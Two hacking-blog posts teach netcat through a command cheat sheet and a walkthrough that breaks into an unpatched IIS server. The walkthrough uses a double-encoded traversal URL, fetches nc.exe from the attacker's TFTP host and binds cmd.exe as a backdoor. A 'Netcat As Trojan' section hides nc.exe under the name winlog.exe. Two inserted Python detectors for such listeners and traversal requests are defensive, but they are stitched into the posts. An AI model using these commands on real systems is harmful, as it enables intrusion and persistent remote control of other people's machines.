Thursday, 31 May 2012

NETCAT MANUAL | COMMANDS


Hello GreenHackers...
In this article we'll discuss NETCAT commands and their use. Those who don't know about NETCAT should read my previous post, NETCAT | BEGINNER GUIDE.


Okay So Let's Start..

Important Switches

  • -d         detach from console, stealth mode
  • -e prog    inbound program to exec [dangerous!!]
  • -g         source-routing hop point[s], up to 8
  • -G num     source-routing pointer: 4, 8, 12, ...
  • -i secs    delay interval for lines sent, ports scanned
  • -l         listen mode, for inbound connects
  • -L         listen harder, re-listen on socket close
  • -n         numeric-only IP addresses, no DNS
  • -o file    hex dump of traffic
  • -p port    local port number
  • -r         randomize local and remote ports
  • -s addr    local source address
  • -t         answer TELNET negotiation
  • -u         UDP mode
  • -v         verbose [use twice to be more verbose]
  • -w secs    timeout for connects and final net reads
  • -z         zero-I/O mode [used for scanning]

Netcat Connecting

Run nc in connect mode and connect to port 139
nc -p 31337 127.0.0.1 139

Run nc in connect mode and connect to port 139 with verbose display (-v given twice makes it more verbose)
nc -v -v -p 31337 127.0.0.1 139

Run nc in connect mode and connect to port 139 with TIMEOUT set to 5
nc -w 5 -p 31337 127.0.0.1 139


Run nc in connect mode and connect to port 139 with TIMEOUT set to 5 and verbose display
nc -v -v -w 5 -p 31337 127.0.0.1 139


Netcat Execute

-e executes a program if netcat is compiled with -DGAPING_SECURITY_HOLE.

Nc.exe is compiled to execute when -e is used.

Example

nc -l -d -p 10000 -e cmd.exe

or

nc -L -d -p 10000 -e cmd.exe

This will run nc in detached mode and listen on port 10000.


Netcat Listen
Use the -L switch to reconnect to the same Netcat session.
This way you can connect over and over to the same Netcat process.

Example:

nc -l -p 53 -t -e cmd.exe

nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'

Netcat File Sending
To receive a file named newfile on the destination system start netcat with the following command:
nc -l -p 1234 > newfile


On the source system send a file named newfile to the destination system with the following command:

nc destinationIP 1234 < newfile

Netcat Banner Grabbing

nc -vvn hostIP 80

nc -vvn hostIP 8080

Once connected type HEAD / HTTP/1.0 [Hit enter twice]

nc -v www.website.com 80 < get.txt
Checking WEB Header.

Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)
[Carriage]
In perl you can use print $socket "GET / HTTP/1.0\n\n";


echo "blahblahblah" | nc hostIP 80 > default.htm

cat get.txt | nc hostIP 80


Netcat Web Banner Grabber

First File is a text file:

-----   begin get.txt   -----
GET / HTTP/1.0
[HIT ENTER IN YOUR EDITOR]
[HIT ENTER IN YOUR EDITOR]
-----   end get.txt     -----



The second file is a batch file:

-----   begin getweb.cmd  -----
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt
-----   end getweb.cmd    -----

You run it like this: getweb.cmd www.someweb.com


Netcat Finger & Telnet

Netcat as a simple finger client:

nc -v hostIP 79 < user.txt
The file "user.txt" contains the username you are interested in.

You can also send the output to a log file.

nc -v hostIP 79 < user.txt > log.txt

Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d 127.0.0.1 -p 23

Netcat Simple Server

To create a simple server

nc -l -p 1234 < file

A very simple web server

nc -L -d -p 80 < file

A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe

Netcat As Trojan

We will use the -t switch to answer telnet negotiation. Netcat should be compiled with the -DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe
and/or
nc -L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note winlog.exe = nc.exe)

Connect to your trojan using

nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
To send netcat on a remote box using tftp
tftp -i remoteip GET nc.exe
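
From the defender's side, the switch combinations in this section are what to look for in process-creation logs. The following is an added example, not part of the original article or of netcat itself: a heuristic that parses a command line with the switch table above and flags a listener that execs a program on connect, even when nc.exe has been renamed as with winlog.exe. The function names, the sample command lines and the C:\Windows\Temp path are constructed.

```python
"""Flag netcat-style 'listener that execs a program' command lines."""
import shlex

TAKES_ARG = set("egGiopsw")   # switches from the table above that consume a value
KNOWN_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe"}


def parse_switches(cmdline):
    """Return (image_name, {switch: value or True}) for one command line."""
    tokens = shlex.split(cmdline, posix=False)   # keeps Windows backslashes intact
    if not tokens:
        return "", {}
    image = tokens[0].strip("\"'").replace("\\", "/").rsplit("/", 1)[-1].lower()
    switches, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and len(tok) > 1:
            letters = tok[1:]
            for pos, ch in enumerate(letters):
                if ch not in TAKES_ARG:
                    switches[ch] = True          # plain flag, possibly bundled (-vvn)
                    continue
                value = letters[pos + 1:]        # value glued to the switch (-p10000)
                if not value and i + 1 < len(tokens):
                    i += 1
                    value = tokens[i]            # value in the next token (-p 10000)
                switches[ch] = value.strip("\"'")
                break
        i += 1
    return image, switches


def classify(cmdline):
    """Heuristic findings for one command line; an empty list means nothing flagged."""
    image, sw = parse_switches(cmdline)
    port = sw.get("p", "")
    if not (("l" in sw or "L" in sw) and port.isdigit()):
        return []                                # not a listener on a numeric port
    known = image in KNOWN_NAMES
    if "e" not in sw:
        return ["listener:" + port] if known else []
    findings = ["listener:" + port, "exec-on-connect:" + sw["e"]]
    if "L" in sw:
        findings.append("persistent")            # re-listens after each disconnect
    if "d" in sw:
        findings.append("detached")              # no console window
    if not known:
        findings.append("renamed-binary:" + image)
    return findings


# Constructed process-creation command lines (the path in the first is made up).
SAMPLE_EVENTS = [
    r"C:\Windows\Temp\winlog.exe -L -d -p 139 -t -e cmd.exe",
    "nc -v -l -p 5050 -e '/bin/bash'",
    "nc -l -p 1234 > newfile",
    "nc -vvn 192.0.2.10 80",
    "grep -l -e error app.log",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(classify(event) or ["ok"], "<-", event)
```

The -l/-p/-e test is a heuristic: other tools reuse those letters, so tune it against your own process inventory before alerting on it.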

These are just some commands of Netcat to show the power and versatility of Netcat. I found this article on the web, written by Adonis a.k.a. NtWaK0.

Enjoy Friends With NETCAT....
















Thursday, 24 May 2012

NetCat | Beginner Guide



Hello GreenHackers..
In this article we will discuss NetCat. NetCat is also known as the Swiss Army Knife.
So Let's Start...

Netcat is a utility that is able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it is essential that you understand the capabilities of Netcat. Netcat can be used as a port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too. It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺ During this tutorial I'll demonstrate a complete hack, using Netcat only, just to point out how versatile it is.


Port scanning with Netcat

A scanning example from Hobbit is "nc -v -w 2 -z target 20-30". Netcat will try connecting to every port between 20 and 30 [inclusive] at the target, and will likely inform you about an FTP server, telnet server, and mailer along the way. The -z switch prevents sending any data to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on. To limit scanning speed if desired, -i will insert a delay between each port probe. Even though Netcat can be used for port scanning, it isn't its strength. A tool such as Nmap is better suited for port scanning.


We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and 25 are open.

Banner Grabbing with Netcat


So we're interested in knowing what's running behind port 80 and 21. We can use Netcat to grab port banners in the following way:



So we know it's probably a Windows 2000 machine as it's running IIS 5.0 and Microsoft FTP Service.

Let's try to send a malformed URL which attempts to exploit the File Traversal vulnerability in unpatched IIS servers (Pre SP3). We will be using Netcat to check for the vulnerability, and if found (and it will!), we will upload Netcat to the IIS server and demonstrate how we can use Netcat as a backdoor. If you do not know what the Unicode File Traversal exploit is, you can check the "IIS Unicode File Traversal" tutorial, or read it up on the net.
Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and execute programs anywhere on the attacked machine.

The point here isn't hacking IIS, but the use of NetCat as a Backdoor. Don't get distracted by the whole "Hacking into IIS" thing.


Now we've sent the URL: http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ to the vulnerable IIS server and what we see is a directory listing of the IIS server C drive. Great! Now we want to upload Netcat to the IIS server, so we'll use TFTP and integrate the TFTP commands into the malformed URL.


tftp -i 192.168.1.9 GET nc.exe


Is transformed to:

http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe
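
The %255c in that URL is a backslash percent-encoded twice (%25 decodes to %), so a filter that decodes only once never sees the ..\ sequence. The following is an added example, not part of the original article: a web-log check that decodes a request path until it stops changing and flags traversal that escapes the web root. The function names and every sample request except the URL quoted above are constructed.

```python
"""Flag request paths whose directory traversal only appears after decoding."""
from urllib.parse import unquote, unquote_plus

PROGRAM_HINTS = ("cmd.exe", "tftp", "nc.exe")   # programs named in the walkthrough


def decode_fully(text, max_rounds=5):
    """Percent-decode until the text stops changing; return (text, rounds used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds


def path_segments(path):
    """Split on / and backslash (IIS accepts both), dropping empty and '.' parts."""
    return [s for s in path.replace("\\", "/").split("/") if s not in ("", ".")]


def escapes_root(segments):
    """True if '..' segments ever climb above the starting directory."""
    depth = 0
    for seg in segments:
        depth += -1 if seg == ".." else 1
        if depth < 0:
            return True
    return False


def inspect_request(target):
    """Return findings for a request target (path plus optional ?query)."""
    path, _, query = target.partition("?")
    decoded, rounds = decode_fully(path)
    segments = path_segments(decoded)
    findings = []
    if ".." in segments and ".." not in path_segments(path):
        findings.append("traversal-hidden-by-%d-decode-rounds" % rounds)
    if escapes_root(segments):
        findings.append("escapes-web-root")
    haystack = (decoded + " " + unquote_plus(query)).lower()   # substring heuristic
    findings += ["program:" + p for p in PROGRAM_HINTS if p in haystack]
    return findings


# Request targets as they would appear in a web log; all but the first are constructed.
SAMPLE_REQUESTS = [
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\",
    "/static/%2e%2e/%2e%2e/boot.ini",
    "/docs/a/../b/index.html",
    "/images/logo%20small.gif",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(inspect_request(request) or ["ok"], "<-", request)
```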


Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe file:




Netcat as a BackDoor


So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (let's choose port 10001) and then we can connect to this port from our attacking machine… using Netcat of course!


The command we want to give on the server looks like this:


nc -L -p 10001 -d -e cmd.exe


Here's what that command does:

nc - tells Windows to run the nc.exe file with the following arguments:

-L Tells netcat to not close and wait for connections

-p Specifies a port to listen for a connection on

-d Tells Netcat to detach from the process we want it to run.

-e Tells what program to run once the port is connected to (cmd.exe)


If we now want to convert this command for Unicode URL use, it will look like this:


http://<ExploitURL>/c+nc+-L+-p+10001+-d+-+cmd.exe




Now we will execute Netcat on the remote IIS machine:



This should have started Netcat listening on port 10001 on the IIS machine and should connect the cmd.exe process to the connection stream. From our machine we will try to connect to the Netcat on the IIS server.


We have now "Shoveled a Shell" using Netcat. We effectively have a remote command prompt of the IIS server, as can be seen from the IPConfig.

Transferring files using Netcat

Let's look at other possibilities Netcat can provide. Say we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don't want to TFTP the file. We can use Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system, start Netcat on the IIS server with the following command:


nc -l -p 1234 > hack.txt


Issue a ^C on the source system and you're done. Be sure to check the file to be sure it is the same size as the original.

This is what hack.txt looks like



And it's Done :)


We can see that the file hack.txt has been transferred to the target system, via port 1234.


These are just a few of the wonderful options Netcat has to offer. Definitely worth RTFMing. Imagine all the wonderful possibilities of overcoming firewalls with netcat…
This article is not written by me, but I think it is good for beginners.
You Can Download NetCat From HERE
If you are having problems due to antivirus programs detecting this as a threat, the following version may be helpful to you. It is compiled with the -e remote execution option disabled. Download from HERE.

Enjoy NetCat....

